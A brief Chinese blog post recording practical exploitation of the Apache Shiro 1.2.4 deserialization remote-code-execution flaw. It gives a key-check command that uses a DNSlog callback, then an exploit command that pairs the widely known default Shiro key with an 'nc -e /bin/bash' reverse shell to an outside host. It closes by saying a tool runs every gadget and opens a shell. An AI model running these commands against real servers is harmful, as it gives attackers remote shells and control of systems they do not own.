shiro RCE (反序列化漏洞)

shiro RCE 攻击

这篇讲1.2.4的反序列化漏洞在实战中的记录

第一种比较稳妥的验证漏洞方式:

1 POC

python shiro_check_key.py https://xxx.xxx.xxx.xxx "my0njp.dnslog.cn"

shiro RCE (反序列化漏洞)_第1张图片

DNSlog收到请求(平台地址:http://www.dnslog.cn/)

shiro RCE (反序列化漏洞)_第2张图片

2 EXP

这里的回显是基于spring框架的,其实可以直接用过监听JMPServer直接执行命令

java -jar ShirobootRce.jar https://xxx.xxx.xxx.xxx/login Z3VucwAAAAAAAAAAAAAAAA== c3 "nc -e /bin/bash xxx.xxx.xxx.xxx 8081"

shiro RCE (反序列化漏洞)_第3张图片

第二种比较稳妥的验证漏洞的方式:

也需要结合第三方平台DNSlog

shiro RCE (反序列化漏洞)_第4张图片

默认会把所有的Gadget跑一遍,然后直接点执行就可以反弹shell

你可能感兴趣的:(web漏洞复现,红蓝对抗-攻防安全)